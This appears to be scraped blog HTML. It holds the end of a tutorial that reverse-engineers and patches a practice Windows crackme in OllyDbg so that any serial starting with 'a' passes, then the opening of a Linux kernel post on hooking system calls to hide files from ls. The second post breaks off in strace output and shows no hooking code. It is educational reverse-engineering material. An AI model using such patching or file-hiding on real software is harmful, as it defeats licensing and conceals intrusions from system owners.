CALL EDI ; \SetDlgItemTextA/span/span span class="code-line"/code/pre/div /td/tr/table pThe a href="http://msdn.microsoft.com/en-gb/library/windows/desktop/ms645521%28v=vs.85%29.aspx" target="_blank"prototype/a for this function is:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="n"BOOL/spanspan class="w" /spanspan class="n"WINAPI/spanspan class="w" /spanspan class="n"SetDlgItemText/spanspan class="p"(/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"_In_/spanspan class="w" /spanspan class="n"HWND/spanspan class="w" /spanspan class="n"hDlg/spanspan class="p",/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"_In_/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"nIDDlgItem/spanspan class="p",/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"_In_/spanspan class="w" /spanspan class="n"LPCTSTR/spanspan class="w" /spanspan class="n"lpString/spanspan class="w"/span/span span class="code-line"span class="p");/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pLooking at this its obvious that the control with ID 3EA is the serial number field because it is being set to "Enter your serial..."./p pWe can verify this by setting a a href="https://en.wikipedia.org/wiki/Breakpoint" target="_blank"breakpoint/a at the top of the serial checking function, running the application and checking the value of the ECX register./p pFirst go to the check function again:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-crypt-function.png" width="800"/p pThen right click on the top instruction (at address code00401000/code) and click emBreakpoint-gt;Toggle/em or press emF2/em:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-set-breakpoint-crypt-function.png" width="800"/p pYou should then see the background of the address section (on the far left) turn red:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-set-breakpoint-crypt-function2.png" width="800"/p pThen run the application by clicking emDebug-gt;Run/em or pressing emF9/em:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-run-crackme.png" width="800"/p pYou should see this after the breakpoint is hit (it shouldn't take long for the breakpoint to hit):/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-breakpoint-hit.png" width="800"/p pAs you can see in the registers window (in the top right), the value of ECX is the address that contains the string "Enter your serial..." so our static analysis of the code was correct./p pNow we can get back to analysing the code in this serial checking function./p pThe following is the start of the function excluding the prologue:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/span span class="code-line"span class="normal"8/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x"00401003 . 8A01 MOV AL,BYTE PTR DS:[ECX]/span/span span class="code-line"span class="x"00401005 . 83EC 20 SUB ESP,20/span/span span class="code-line"span class="x"00401008 . 56 PUSH ESI/span/span span class="code-line"span class="x"00401009 . 33F6 XOR ESI,ESI/span/span span class="code-line"span class="x"0040100B . 84C0 TEST AL,AL/span/span span class="code-line"span class="x"0040100D . 0F84 B3000000 JE SomeCryp.004010C6/span/span span class="code-line"span class="x"00401013 . 8D55 E0 LEA EDX,DWORD PTR SS:[EBP-20]/span/span span class="code-line"span class="x"00401016 . 2BD1 SUB EDX,ECX/span/span span class="code-line"/code/pre/div /td/tr/table pThe first line loads the first byte of our serial into the AL register (The lower byte of the EAX register)./p pSome space is then reserved on the stack for a local variable. On line 3 the value of the ESI register is saved on the stack and zero'ed out (xor'ing anything with itself makes the result 0)./p pThe byte in the AL register (at this point in time the first character in our serial) is checked for 0 on line 5 and if it is 0 execution jumps to code004010C6/code./p pLet's look at the code at code004010C6/code:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x"004010C6 gt; 32C0 XOR AL,AL/span/span span class="code-line"span class="x"004010C8 . 5E POP ESI/span/span span class="code-line"span class="x"004010C9 . 8BE5 MOV ESP,EBP/span/span span class="code-line"span class="x"004010CB . 5D POP EBP/span/span span class="code-line"span class="x"004010CC . C3 RETN/span/span span class="code-line"/code/pre/div /td/tr/table pThis clearly just sets the return value to code0/code and returns, we already know that we don't want a return value of code0/code so this is our failure case./p pFollowing the jump we have an LEA instruction, which loads the value of our local variable, and a SUB command, which calculates the distance from the local variable to where our serial is in memory./p pThe result of these 2 instructions (the distance from the local variable to where our serial is in memory) is stored in the EDX register./p pNext we have the following loop:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x"00401018 gt; 3C 61 CMP AL,61/span/span span class="code-line"span class="x"0040101A . 0F8C A6000000 JL SomeCryp.004010C6/span/span span class="code-line"span class="x"00401020 . 3C 7A CMP AL,7A/span/span span class="code-line"span class="x"00401022 . 0F8F 9E000000 JG SomeCryp.004010C6/span/span span class="code-line"span class="x"00401028 . 88040A MOV BYTE PTR DS:[EDX+ECX],AL/span/span span class="code-line"span class="x"0040102B . 8A41 01 MOV AL,BYTE PTR DS:[ECX+1]/span/span span class="code-line"span class="x"0040102E . 41 INC ECX/span/span span class="code-line"span class="x"0040102F . 46 INC ESI/span/span span class="code-line"span class="x"00401030 . 84C0 TEST AL,AL/span/span span class="code-line"span class="x"00401032 .^75 E4 JNZ SHORT SomeCryp.00401018/span/span span class="code-line"/code/pre/div /td/tr/table pThis is checking if the value in AL is below 61 (lines 1 and 2) or above 7A (lines 3 and 4) and jumping to code004010C6/code if it is./p pLooking at the a href="http://web.cs.mun.ca/~michael/c/ascii-table.html" target="_blank"ascii table/a 61 is stronga/strong and 7A is strongz/strong./p pSo if the first character is not a lowercase letter, execution will jump to the same failure case as before./p pIf the jumps aren't taken the byte is moved to the address pointed to by codeEDX+ECX/code on line 5. This will point to the right position in the local variable due to the earlier codeSUB/code command./p pThen (on line 6) the next byte in the serial is moved into AL, both ECX and ESI are incremented. Lastly, on lines 9 and 10, AL is checked for 0 and the jump to code00401018/code is only taken if AL is 0./p pThis is clearly just making sure only lowercase letters are part of the serial, so at least we now know the possible different characters that are allowed in the serial./p pAnother thing to notice here is that ESI is being used as a counter and at the end will contain the number of characters in the serial./p pLet's look at the 2 lines following this loop:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x"00401034 . 83FE 1A CMP ESI,1A/span/span span class="code-line"span class="x"00401037 . 0F85 89000000 JNZ SomeCryp.004010C6/span/span span class="code-line"/code/pre/div /td/tr/table pIf you'll remember, ESI contains the number of characters in the serial and here its being checked against code1A/code (or 26 in decimal). If ESI isn't equal to 26 then our failure case is taken again (code004010C6/code)./p pWe then zero out EAX and onto the next loop:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x"00401040 gt; 8A88 10304000 MOV CL,BYTE PTR DS:[EAX+403010]/span/span span class="code-line"span class="x"00401046 . 8888 40314000 MOV BYTE PTR DS:[EAX+403140],CL/span/span span class="code-line"span class="x"0040104C . 40 INC EAX/span/span span class="code-line"span class="x"0040104D . 84C9 TEST CL,CL/span/span span class="code-line"span class="x"0040104F .^75 EF JNZ SHORT SomeCryp.00401040/span/span span class="code-line"/code/pre/div /td/tr/table pThis is simply moving a string from code403010/code to code403140/code and only stops once it hits a code0/code./p pThe data at code403010/code we can see by right clicking on the line (line 1 here) and click emFollow in Dump -gt; Address constant/em:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-follow-address-constant.png" width="800"/p pYou should see this:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-data.png" width="800"/p pIt will show the following in the dump window:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go"00403010 49 78 20 6C 7A 63 74 75 Ix lzctu/span/span span class="code-line"span class="go"00403018 73 64 7A 65 74 67 63 2C sdzetgc,/span/span span class="code-line"span class="go"00403020 20 65 78 20 6E 2D 66 73 ex n-fs/span/span span class="code-line"span class="go"00403028 62 20 28 6E 76 66 6E 75 b (nvfnu/span/span span class="code-line"span class="go"00403030 6A 75 76 75 6A 73 78 2D juvujsx-/span/span span class="code-line"span class="go"00403038 66 73 62 29 20 6A 6E 20 fsb) jn/span/span span class="code-line"span class="go"00403040 65 20 66 65 6E 6A 6C 20 e fenjl/span/span span class="code-line"span class="go"00403048 6C 73 61 74 73 78 72 78 lsatsxrx/span/span span class="code-line"span class="go"00403050 75 20 73 77 20 6E 63 61 u sw nca/span/span span class="code-line"span class="go"00403058 61 72 75 7A 6A 6C 20 71 aruzjl q/span/span span class="code-line"span class="go"00403060 72 63 20 65 68 64 73 7A rc ehdsz/span/span span class="code-line"span class="go"00403068 6A 75 67 61 6E 20 70 67 jugan pg/span/span span class="code-line"span class="go"00403070 6A 6C 67 20 74 72 7A 77 jlg trzw/span/span span class="code-line"span class="go"00403078 73 7A 61 6E 20 6E 76 66 szan nvf/span/span span class="code-line"span class="go"00403080 6E 75 6A 75 76 75 6A 73 nujuvujs/span/span span class="code-line"span class="go"00403088 78 2E 20 49 78 20 66 68 x. Ix fh/span/span span class="code-line"span class="go"00403090 73 6C 71 20 6C 6A 74 67 slq ljtg/span/span span class="code-line"span class="go"00403098 72 7A 6E 2C 20 75 67 72 rzn, ugr/span/span span class="code-line"span class="go"004030A0 63 20 65 7A 72 20 75 63 c ezr uc/span/span span class="code-line"span class="go"004030A8 74 6A 6C 65 68 68 63 20 tjlehhc/span/span span class="code-line"span class="go"004030B0 76 6E 72 6D 20 75 73 20 vnrm us/span/span span class="code-line"span class="go"004030B8 73 66 6E 6C 76 7A 72 20 sfnlvzr/span/span span class="code-line"span class="go"004030C0 75 67 72 20 7A 72 68 65 ugr zrhe/span/span span class="code-line"span class="go"004030C8 75 6A 73 78 6E 67 6A 74 ujsxngjt/span/span span class="code-line"span class="go"004030D0 20 66 72 75 70 72 72 78 fruprrx/span/span span class="code-line"span class="go"004030D8 20 75 67 72 20 71 72 63 ugr qrc/span/span span class="code-line"span class="go"004030E0 20 65 78 6D 20 75 67 72 exm ugr/span/span span class="code-line"span class="go"004030E8 20 6C 6A 74 67 72 7A 75 ljtgrzu/span/span span class="code-line"span class="go"004030F0 72 62 75 2E 00 rbu../span/span span class="code-line"/code/pre/div /td/tr/table pThis is everything before and including the first code0/code./p pOnce this loop has completed we have the following:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x"00401051 . 33C9 XOR ECX,ECX/span/span span class="code-line"span class="x"00401053 . 380D 40314000 CMP BYTE PTR DS:[403140],CL/span/span span class="code-line"span class="x"00401059 . 74 2D JE SHORT SomeCryp.00401088/span/span span class="code-line"span class="x"0040105B . EB 03 JMP SHORT SomeCryp.00401060/span/span span class="code-line"/code/pre/div /td/tr/table pThis zero's out ECX and checks the value at code403140/code against CL (code0/code) and if they match jumps to code00401088/code, otherwise jumps to code00401060/code./p pLet's see what happens if you jump on line 3 is taken:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x"00401088 gt; 83C8 FF OR EAX,FFFFFFFF/span/span span class="code-line"span class="x"0040108B . BA 40314000 MOV EDX,SomeCryp.00403140/span/span span class="code-line"span class="x"00401090 . 85C9 TEST ECX,ECX/span/span span class="code-line"span class="x"00401092 . 74 19 JE SHORT SomeCryp.004010AD/span/span span class="code-line"/code/pre/div /td/tr/table pAnother jump is taken if ECX is code0/code and we know it will at this point. Here is the code at that location:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x"004010AD gt; F7D0 NOT EAX/span/span span class="code-line"span class="x"004010AF . 3D 18B291F8 CMP EAX,F891B218/span/span span class="code-line"span class="x"004010B4 . 75 10 JNZ SHORT SomeCryp.004010C6/span/span span class="code-line"span class="x"004010B6 . 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]/span/span span class="code-line"span class="x"004010B9 . C700 40314000 MOV DWORD PTR DS:[EAX],SomeCryp.00403140/span/span span class="code-line"span class="x"004010BF . B0 01 MOV AL,1/span/span span class="code-line"span class="x"004010C1 . 5E POP ESI/span/span span class="code-line"span class="x"004010C2 . 8BE5 MOV ESP,EBP/span/span span class="code-line"span class="x"004010C4 . 5D POP EBP/span/span span class="code-line"span class="x"004010C5 . C3 RETN/span/span span class="code-line"/code/pre/div /td/tr/table pThis is the end of the function./p pIts pretty obvious that this function creates a checksum of a modified version of the string we found earlier and checks it against codeF891B218/code, if it is equal the function returns 1, otherwise it return 0./p pAt this point I remember that there are no rules to this crackme so patching is allowed./p pExit OllyDBG completely and make a copy of the application like this:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/save-copy.png"/p pThis isn't needed, I just do it to be careful./p pOpe the copy and go to the serial checking function and the line under codeCMP AL,61/code, where it says codeJL SomeCryp.004010C6/code at code0040101A/code, double click, type codeje 4010A2/code and click emAssemble/em./p pThe little window should have stayed open, type codejmp 4010C6/code and click emAssemble/em again./p pYou should see the following:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-editing-binary.png" width="800"/p pThis should check if the first character in the serial is stronga/strong and if it is jump to code4010A2/code, otherwise jump to code4010C6/code which is the failure case./p pClick emCancel/em and scroll down the the memory address code4010A2/code. Double click there, type codemov eax, 0xf891b218/code and click emAssemble/em./p pYou should see this:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-editing-binary2.png" width="800"/p pNow just fill the rest with a href="https://en.wikipedia.org/wiki/NOP" target="_blank"NOP's/a until the codecmp/code at code004010AF/code like this:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-nops.png" width="800"/p pThis should ensure that if the serial contains an stronga/strong at the start it should set the value of EAX accordingly./p pSave these modifications to the application file by right clicking anywhere and clicking emCopy to exe-gt;All modifications/em:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-copy-to-exe.png" width="800"/p pIt should open this window:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-copy-to-exe-dialog.png"/p pClick emCopy all/em and you should see something like this:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-new-binary.png" width="800"/p pClick the close button in the top right corner of this window and you should get the following dialog:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-save-binary.png"/p pNow if you browse to the directory with the crackme files in you should see a new file:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/new-files.png"/p pThe file ending in strong.bak/strong is the backup created by Olly, and the 1 named codeSomeCrypto~01 - Copy.exe/code is our patched file./p pJust run it and put anything as the name and any serial starting with an stronga/strong:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/complete.png" width="800"/p pCRACKED!!! :-)/p h2Conclusion/h2 pYou don't need to fully understand every part of an application while reverse engineering it, it depends on what you are trying to achieve and the complexity of the application./p pTry to concentrate as much as possible on the important areas and ignore everything else./p pWhen beating a protection mechanism sometimes its easiest to just bypass the protection as opposed to trying to break it./p h2Further Reading/h2 pThe best book I've read on this topic is emReversing: Secrets of Reverse Engineering/em by emEldad Eilam/em./p pHappy Hacking :-)/p

System Call Hooking

pWelcome to the third post on Linux kernel hacking. In the a href="/linux-kernel-hacking/2014/05/10/first-lkm/"first/a we looked at how to create a basic LKM and in the a href="/linux-kernel-hacking/2014/06/06/a-simple-character-device/"second/a we created a character device and communicated with it./p pNow we are going to do something which is obviously very useful for malware, a href="https://en.wikipedia.org/wiki/System_call" target="_blank"system call/a a href="https://en.wikipedia.org/wiki/Hooking" target="_blank"hooking/a./p pHooking a system call means that you are able to manipulate data sent from userland applications to the operating system (OS) and vice versa./p !-- more -- pThis means that you can hide things from applications running on the OS and influence their behaviour./p pHere we will develop an LKM that will hide files from the unix codels/code command./p h2Determining Relevant System Calls/h2 pThe first step is to determine the system calls used by codels/code to list the filenames in a directory./p pcodestrace/code is a tool that can be used to trace every system call used by an application:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal" 10/span/span span class="code-line"span class="normal" 11/span/span span class="code-line"span class="normal" 12/span/span span class="code-line"span class="normal" 13/span/span span class="code-line"span class="normal" 14/span/span span class="code-line"span class="normal" 15/span/span span class="code-line"span class="normal" 16/span/span span class="code-line"span class="normal" 17/span/span span class="code-line"span class="normal" 18/span/span span class="code-line"span class="normal" 19/span/span span class="code-line"span class="normal" 20/span/span span class="code-line"span class="normal" 21/span/span span class="code-line"span class="normal" 22/span/span span class="code-line"span class="normal" 23/span/span span class="code-line"span class="normal" 24/span/span span class="code-line"span class="normal" 25/span/span span class="code-line"span class="normal" 26/span/span span class="code-line"span class="normal" 27/span/span span class="code-line"span class="normal" 28/span/span span class="code-line"span class="normal" 29/span/span span class="code-line"span class="normal" 30/span/span span class="code-line"span class="normal" 31/span/span span class="code-line"span class="normal" 32/span/span span class="code-line"span class="normal" 33/span/span span class="code-line"span class="normal" 34/span/span span class="code-line"span class="normal" 35/span/span span class="code-line"span class="normal" 36/span/span span class="code-line"span class="normal" 37/span/span span class="code-line"span class="normal" 38/span/span span class="code-line"span class="normal" 39/span/span span class="code-line"span class="normal" 40/span/span span class="code-line"span class="normal" 41/span/span span class="code-line"span class="normal" 42/span/span span class="code-line"span class="normal" 43/span/span span class="code-line"span class="normal" 44/span/span span class="code-line"span class="normal" 45/span/span span class="code-line"span class="normal" 46/span/span span class="code-line"span class="normal" 47/span/span span class="code-line"span class="normal" 48/span/span span class="code-line"span class="normal" 49/span/span span class="code-line"span class="normal" 50/span/span span class="code-line"span class="normal" 51/span/span span class="code-line"span class="normal" 52/span/span span class="code-line"span class="normal" 53/span/span span class="code-line"span class="normal" 54/span/span span class="code-line"span class="normal" 55/span/span span class="code-line"span class="normal" 56/span/span span class="code-line"span class="normal" 57/span/span span class="code-line"span class="normal" 58/span/span span class="code-line"span class="normal" 59/span/span span class="code-line"span class="normal" 60/span/span span class="code-line"span class="normal" 61/span/span span class="code-line"span class="normal" 62/span/span span class="code-line"span class="normal" 63/span/span span class="code-line"span class="normal" 64/span/span span class="code-line"span class="normal" 65/span/span span class="code-line"span class="normal" 66/span/span span class="code-line"span class="normal" 67/span/span span class="code-line"span class="normal" 68/span/span span class="code-line"span class="normal" 69/span/span span class="code-line"span class="normal" 70/span/span span class="code-line"span class="normal" 71/span/span span class="code-line"span class="normal" 72/span/span span class="code-line"span class="normal" 73/span/span span class="code-line"span class="normal" 74/span/span span class="code-line"span class="normal" 75/span/span span class="code-line"span class="normal" 76/span/span span class="code-line"span class="normal" 77/span/span span class="code-line"span class="normal" 78/span/span span class="code-line"span class="normal" 79/span/span span class="code-line"span class="normal" 80/span/span span class="code-line"span class="normal" 81/span/span span class="code-line"span class="normal" 82/span/span span class="code-line"span class="normal" 83/span/span span class="code-line"span class="normal" 84/span/span span class="code-line"span class="normal" 85/span/span span class="code-line"span class="normal" 86/span/span span class="code-line"span class="normal" 87/span/span span class="code-line"span class="normal" 88/span/span span class="code-line"span class="normal" 89/span/span span class="code-line"span class="normal" 90/span/span span class="code-line"span class="normal" 91/span/span span class="code-line"span class="normal" 92/span/span span class="code-line"span class="normal" 93/span/span span class="code-line"span class="normal" 94/span/span span class="code-line"span class="normal" 95/span/span span class="code-line"span class="normal" 96/span/span span class="code-line"span class="normal" 97/span/span span class="code-line"span class="normal" 98/span/span span class="code-line"span class="normal" 99/span/span span class="code-line"span class="normal"100/span/span span class="code-line"span class="normal"101/span/span span class="code-line"span class="normal"102/span/span span class="code-line"span class="normal"103/span/span span class="code-line"span class="normal"104/span/span span class="code-line"span class="normal"105/span/span span class="code-line"span class="normal"106/span/span span class="code-line"span class="normal"107/span/span span class="code-line"span class="normal"108/span/span span class="code-line"span class="normal"109/span/span span class="code-line"span class="normal"110/span/span span class="code-line"span class="normal"111/span/span span class="code-line"span class="normal"112/span/span span class="code-line"span class="normal"113/span/span span class="code-line"span class="normal"114/span/span span class="code-line"span class="normal"115/span/span span class="code-line"span class="normal"116/span/span span class="code-line"span class="normal"117/span/span span class="code-line"span class="normal"118/span/span span class="code-line"span class="normal"119/span/span span class="code-line"span class="normal"120/span/span span class="code-line"span class="normal"121/span/span span class="code-line"span class="normal"122/span/span span class="code-line"span class="normal"123/span/span span class="code-line"span class="normal"124/span/span span class="code-line"span class="normal"125/span/span span class="code-line"span class="normal"126/span/span span class="code-line"span class="normal"127/span/span span class="code-line"span class="normal"128/span/span span class="code-line"span class="normal"129/span/span span class="code-line"span class="normal"130/span/span span class="code-line"span class="normal"131/span/span span class="code-line"span class="normal"132/span/span span class="code-line"span class="normal"133/span/span span class="code-line"span class="normal"134/span/span span class="code-line"span class="normal"135/span/span span class="code-line"span class="normal"136/span/span span class="code-line"span class="normal"137/span/span span class="code-line"span class="normal"138/span/span span class="code-line"span class="normal"139/span/span span class="code-line"span class="normal"140/span/span span class="code-line"span class="normal"141/span/span span class="code-line"span class="normal"142/span/span span class="code-line"span class="normal"143/span/span span class="code-line"span class="normal"144/span/span span class="code-line"span class="normal"145/span/span span class="code-line"span class="normal"146/span/span span class="code-line"span class="normal"147/span/span span class="code-line"span class="normal"148/span/span span class="code-line"span class="normal"149/span/span span class="code-line"span class="normal"150/span/span span class="code-line"span class="normal"151/span/span span class="code-line"span class="normal"152/span/span span class="code-line"span class="normal"153/span/span span class="code-line"span class="normal"154/span/span span class="code-line"span class="normal"155/span/span span class="code-line"span class="normal"156/span/span span class="code-line"span class="normal"157/span/span span class="code-line"span class="normal"158/span/span span class="code-line"span class="normal"159/span/span span class="code-line"span class="normal"160/span/span span class="code-line"span class="normal"161/span/span span class="code-line"span class="normal"162/span/span span class="code-line"span class="normal"163/span/span span class="code-line"span class="normal"164/span/span span class="code-line"span class="normal"165/span/span span class="code-line"span class="normal"166/span/span span class="code-line"span class="normal"167/span/span span class="code-line"span class="normal"168/span/span span class="code-line"span class="normal"169/span/span span class="code-line"span class="normal"170/span/span span class="code-line"span class="normal"171/span/span span class="code-line"span class="normal"172/span/span span class="code-line"span class="normal"173/span/span span class="code-line"span class="normal"174/span/span span class="code-line"span class="normal"175/span/span span class="code-line"span class="normal"176/span/span span class="code-line"span class="normal"177/span/span span class="code-line"span class="normal"178/span/span span class="code-line"span class="normal"179/span/span span class="code-line"span class="normal"180/span/span span class="code-line"span class="normal"181/span/span span class="code-line"span class="normal"182/span/span span class="code-line"span class="normal"183/span/span span class="code-line"span class="normal"184/span/span span class="code-line"span class="normal"185/span/span span class="code-line"span class="normal"186/span/span span class="code-line"span class="normal"187/span/span span class="code-line"span class="normal"188/span/span span class="code-line"span class="normal"189/span/span span class="code-line"span class="normal"190/span/span span class="code-line"span class="normal"191/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"root@dev:~/lkms# /spanstrace ls/span span class="code-line"span class="go"execve(quot;/bin/lsquot;, [quot;lsquot;], [/* 18 vars */]) = 0/span/span span class="code-line"span class="go"brk(0) = 0x9073000/span/span span class="code-line"span class="go"access(quot;/etc/ld.so.nohwcapquot;, F_OK) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7717000/span/span span class="code-line"span class="go"access(quot;/etc/ld.so.preloadquot;, R_OK) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/etc/ld.so.cachequot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=116616, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 116616, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb76fa000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"access(quot;/etc/ld.so.nohwcapquot;, F_OK) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/lib/i386-linux-gnu/libselinux.so.1quot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"read(3, quot;\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0pP\0\0004\0\0\0quot;..., 512) = 512/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=124904, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 130140, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb76da000/span/span span class="code-line"span class="go"mmap2(0xb76f8000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1d) = 0xb76f8000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"access(quot;/etc/ld.so.nohwcapquot;, F_OK) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/lib/i386-linux-gnu/i686/cmov/librt.so.1quot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"read(3, quot;\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\300\30\0\0004\0\0\0quot;..., 512) = 512/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=30684, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 33360, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb76d1000/span/span span class="code-line"span class="go"mmap2(0xb76d8000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x6) = 0xb76d8000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"access(quot;/etc/ld.so.nohwcapquot;, F_OK) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/lib/i386-linux-gnu/libacl.so.1quot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"read(3, quot;\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\0\32\0\0004\0\0\0quot;..., 512) = 512/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=34436, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb76d0000/span/span span class="code-line"span class="go"mmap2(NULL, 